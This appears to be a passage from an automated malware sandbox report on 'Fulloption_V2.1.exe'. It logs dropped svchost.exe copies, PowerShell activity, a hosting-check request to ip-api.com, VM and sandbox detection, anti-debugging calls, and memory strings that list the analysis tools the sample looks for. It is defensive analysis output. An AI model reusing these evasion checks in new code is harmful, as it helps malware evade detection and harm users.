Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\svchost.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: FullOption_2.1Xenos.exe.0.dr	Binary or memory string: BET\SBAGGY2\SBAGGY\EXAMPLES\BACKENDS\IMGUI_IMPL_WIN32.CPPIO.BACKENDPLATFORMUSERDATA == NULLPTR && "ALREADY INITIALIZED A PLATFORM BACKEND!"IMGUI_IMPL_WIN32XINPUT1_4.DLLXINPUT1_3.DLLXINPUT9_1_0.DLLXINPUT1_2.DLLXINPUT1_1.DLLXINPUTGETCAPABILITIESXINPUTGETSTATEBD != NULLPTR && "NO PLATFORM BACKEND TO SHUTDOWN, OR ALREADY SHUTDOWN?"BD->HWND != 0BD != NULLPTR && "DID YOU CALL IMGUI_IMPLWIN32_INIT()?" NTSETINFORMATIONTHREADNTDLL.DLLVMWAREVBOXVIRTUALSYSTEM\CONTROLSET001\SERVICES\DISK\ENUMSBIEDLL.DLLVBOXHOOK.DLL\\.\VBOXMINIRDRDNOLLYDBG - [CPU]OLLYDBGIMMUNITY DEBUGGER - [CPU]X64DBGHTTP DEBUGGERCHEAT user 7.4THE WIRESHARK NETWORK ANALYZERPROGRESS TELERIK FIDDLER CLASSICCHARLES 4.6.2 - SESSION 1 CHARLES 4.6.2 - SESSION 2 CHARLES 4.6.2 - SESSION 3 *SCYLLA X64 V0.9.8SCYLLA X86 V0.9.8X64DBG[ELEVATED]CHEATuser-X86_64.EXEOLLYDBG.EXEIDA.EXEIDA64.EXERADARE2.EXEX64DBG.EXECHEATuser-X86_64-SSE4-AVX2OLLYDBG.EXECHARLES.EXEWIRESHARK.EXEHTTPDEBUGGERUI.EXEKSDUMPERCLIENT.EXEPROCESSHACKER.EXESCYLLA_X86SCYLLA_X64IT IS IMPOSSIBLE TO CHECK PROCESS LIST.OLLYDBGIDXTPMAINFRAMESUNAWTFRAMEWINLISTERMAINPROCESSHACKERNTQUERYINFORMATIONPROCESS%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S: GENERICSYSTEMBAD CASTINVALID STOF ARGUMENTSTOF ARGUMENT OUT OF RANGELOADED!
Source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, FullOption_2.1Xenos.exe.0.dr	Binary or memory string: SBIEDLL.DLL
Source: Fulloption_V2.1.exe, 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.3.dr, svchost.exe.0.dr	Binary or memory string: SBIEDLL.DLL?1BACBVD8VOSDNODQXYKYKOXGCYB3L4H?XCITP4RXVNDTI8LNZ5A14XDDTULYW2Q?QDU75J9E9ZOPQDKVOU2JYVBLVNBFALY?OOXPU559F4RWTSRV9EANW2ZO42GGH6W?DE1LG4YYVDX7NM9MHXPCIRR0LERTDOU?OTLGKTGYHLIUQO0VTPBJ9O2BJMSFQVS?MLQ8RHEN8WZC8Y9O8CUQEPKAJPFIR1M?GHQBU1PKCTUDZX8N6DUED1SCBUXPWCE?CBIQBXJ8NGHLEGU7NZU2CWP5KVXJ3LO
Source: FullOption_2.1Xenos.exe.0.dr	Binary or memory string: .: "", "EXISTSCREATE_DIRECTORYREMOVE_ALLDNSPY.EXEPROCEXP.EXEX96DBG.EXEX32DBG.EXEILSPY.EXEJETBRAINS.EXEWINDBG.EXEGDB.EXESCYLLA_X64.EXESCYLLA_X86.EXESHARPDEVELOP.EXEMONODEVELOP.EXEOLLYDBG.EXEMEMORYPROFILER.EXEANTS PERFORMANCE PROFILER.EXEJUSTTRACE.EXEBUGAID.EXEREFLECTOR.EXEDOTMEMORY.EXEEVERYTHING.EXECHEATuser-I386.EXEHTTPDEBUGGERSVC.EXEMEGADUMPER.EXEEXTREMEDUMPER.EXEDE4DOT.EXEDE4DOT64.EXEDE4DOT-CEX.EXEDNSPY-X64.EXEDNSPY-X86.EXEDNSPY.EXEINJECTIONDEBUGGER.EXEDUMPER.EXEDEBUGTOOL.EXEREVERSEuser.EXECODEINSPECTOR.EXEMEMORYDUMP.EXEBINARYANALYZER.EXEREVERSEDEBUGGER.EXECRASHDUMPANALYZER.EXECODEEXTRACTOR.EXEBYTESCANNER.EXEDEBUGMONITOR.EXEDECOMPILERTOOL.EXEAPIHOOKDETECTOR.EXEPATCHANALYZER.EXEMEMORYSPY.EXECODETRACER.EXEBINARYINSPECTOR.EXEDEBUGASSISTANT.EXEREVERSEANALYZER.EXEPATCHEXTRACTOR.EXECRASHDUMPREADER.EXECODERECONSTRUCTOR.EXEBYTEINSPECTOR.EXEMALWAREDEBUGGER.EXEHOOKMONITOR.EXEDECOMPILERTOOLSET.EXEBINARYRECONSTRUCTOR.EXEDEBUGGINGWIZARD.EXEBINARYINSPECTORPRO.EXEDEBUGASSISTANTPRO.EXEPATCHCRAFT.EXECONTROLFLOWEXPLORER.EXESIGNATURESCANNER.EXEASSEMBLYINSPECTOR.EXEDECOMPILERX.EXECODEREVEAL.EXEREVERSOMASTER.EXEINSTRUCTIONTRACER.EXEDEBUGASSIST.EXEFLOWANALYZER.EXEMEMORYWATCHER.EXEBREAKPOINTDEBUGGER.EXEVARIABLEINSPECTOR.EXEEXECUTIONTRACKER.EXERUNTIMEDEBUGGER.EXEBYTESCANPRO.EXEMEMORYSNAPSHOTTER.EXEDUMPEXPLORER.EXEDATAHARVEST.EXEBINARYDUMPTOOL.EXEBYTEEXTRACTOR.EXECODESNAPSHOT.EXEMEMORYDUMPPRO.EXEDATAEXTRACT.EXEDUMPMASTER.EXECONTROLFLOWINSPECTOR.EXEFUNCTIONEXTRACTORX.EXESIGNATURESEARCHER.EXEREVERSECODEEXPLORER.EXEASSEMBLYANALYZER.EXEDECOMPILERPRO.EXEBYTEPATCHMASTER.EXECODEREVEALX.EXEDEBUGFLOWMASTER.EXEBREAKPOINTASSISTANT.EXEVARIABLEDEBUGGER.EXEEXECUTIONTRACKERPRO.EXERUNTIMEINSPECTOR.EXEGORGONIDA.EXEHADESDEBUGGER.EXEPHOENIXDISASSEMBLER.EXEELYSIUMANALYZER.EXECERBERUSCRACKER.EXEHYDRARECONSTRUCTOR.EXECHIMERAPATCHKIT.EXEMEDUSAPROFILER.EXENEMEANDECRYPTOR.EXESPHINXCODEEXPLORER.EXEBASILISKRECONSTRUCTOR.EXEMANTICOREANALYZER.EXELEVIATHANDEBUGGER.EXEGRIFFINDECRYPTOR.EXEHYDRAPATCHuser.EXEPHOENIXINJECTOR.EXESPHINXREVERSER.EXECHIMERATRACER.EXECERBERUSDISASSEMBLER.EXEGORGONCODEANALYZER.EXELEVIATHANTRACER.EXEGRIFFINDISASSEMBLER.EXECHIMERARECONSTRUCTOR.EXEBASILISKDECRYPTOR.EXESPHINXCODEINJECTOR.EXECERBERUSANALYZER.EXEGORGONREVERSER.EXEHYDRADEBUGGER.EXEDE4DOTUNPACKER.EXEKRAKENDEBUGGER.EXEOUROBOROSDECRYPTOR.EXESERPENTDISASSEMBLER.EXEWYVERNCODEANALYZER.EXEFUNCTIONEXTRACTOR.EXEDE4DOTPRO.EXEDEOBFUSCATOR.EXENET-DEOBFUSCATOR.EXESYSTEM INFORMER.EXEPROCESS HACKER.EXEPROCEXP64.EXEPROCEXP64A.EXEDE4DOT64.EXEPROCESS HACKER.EXECHEAT userCHEATuser-X86_64-SSE4-AVX2.EXEX64DBG-UNSIGNED.EXESAVE DATA/ FOR WRITING.UNABLE TO OPEN FILE DATA FILES (.DAT)*.DATSAVE DATA\@

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Memory allocated: 3160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Memory allocated: 1B250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 13A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1B2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\svchost.exe	Memory allocated: 1590000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 1ADA0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 5498	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 4342	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4772	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5068	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6062	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3646	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6306	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3337	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2948

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe TID: 2248	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5224	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2548	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188	Thread sleep count: 6062 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188	Thread sleep count: 3646 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3424	Thread sleep count: 6747 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3424	Thread sleep count: 2948 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\ProgramData\svchost.exe TID: 5256	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\svchost.exe TID: 6900	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\svchost.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\svchost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 00000003.00000002.3403575699.000000001D200000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSer
Source: svchost.exe.0.dr	Binary or memory string: vmware
Source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.dr	Binary or memory string: \\.\VBoxMiniRdrDN
Source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.dr	Binary or memory string: VBoxHook.dll
Source: FullOption_2.1Xenos.exe.0.dr	Binary or memory string: Bet\SBAGGY2\SBAGGY\examples\backends\imgui_impl_win32.cppio.BackendPlatformUserData == nullptr && "Already initialized a platform backend!"imgui_impl_win32xinput1_4.dllxinput1_3.dllxinput9_1_0.dllxinput1_2.dllxinput1_1.dllXInputGetCapabilitiesXInputGetStatebd != nullptr && "No platform backend to shutdown, or already shutdown?"bd->hWnd != 0bd != nullptr && "Did you call ImGui_ImplWin32_Init()?" NtSetInformationThreadntdll.dllVMWAREVBOXVIRTUALSYSTEM\ControlSet001\Services\Disk\EnumSbieDll.dllVBoxHook.dll\\.\VBoxMiniRdrDNOllyDbg - [CPU]OllyDbgImmunity Debugger - [CPU]x64dbgHTTP DebuggerCheat user 7.4The Wireshark Network AnalyzerProgress Telerik Fiddler ClassicCharles 4.6.2 - Session 1 Charles 4.6.2 - Session 2 Charles 4.6.2 - Session 3 *Scylla x64 v0.9.8Scylla x86 v0.9.8x64dbg[Elevated]cheatuser-x86_64.exeollydbg.exeida.exeida64.exeradare2.exex64dbg.execheatuser-x86_64-SSE4-AVX2OLLYDBG.EXECharles.exeWireshark.exeHTTPDebuggerUI.exeKsDumperClient.exeProcessHacker.exeScylla_x86Scylla_x64It is impossible to check process list.OLLYDBGIDXTPMainFrameSunAwtFrameWinListerMainProcessHackerNtQueryInformationProcess%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s: genericsystembad castinvalid stof argumentstof argument out of rangeLoaded!
Source: Fulloption_V2.1.exe, 00000000.00000002.2151148890.00000000013D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: FullOption_2.1Xenos.exe.0.dr	Binary or memory string: VMWARE

Source: C:\Users\user\AppData\Roaming\svchost.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Anti Debugging

Source: C:\Users\user\AppData\Roaming\svchost.exe

Code function: 3_2_00007FFD34887A81 CheckRemoteDebuggerPresent,

3_2_00007FFD34887A81

Source: C:\Users\user\AppData\Roaming\svchost.exe

Process queried: DebugPort

Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

Code function: 2_2_00007FF6AE82DF58 GetLastError,IsDebuggerPresent,OutputDebugStringW,

2_2_00007FF6AE82DF58

Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

Code function: 2_2_00007FF6AE82DF58 GetLastError,IsDebuggerPresent,OutputDebugStringW,

2_2_00007FF6AE82DF58

Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

Code function: 2_2_00007FF6AE6D2400 GetProcessHeap,

2_2_00007FF6AE6D2400

Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\ProgramData\svchost.exe	Process token adjusted: Debug
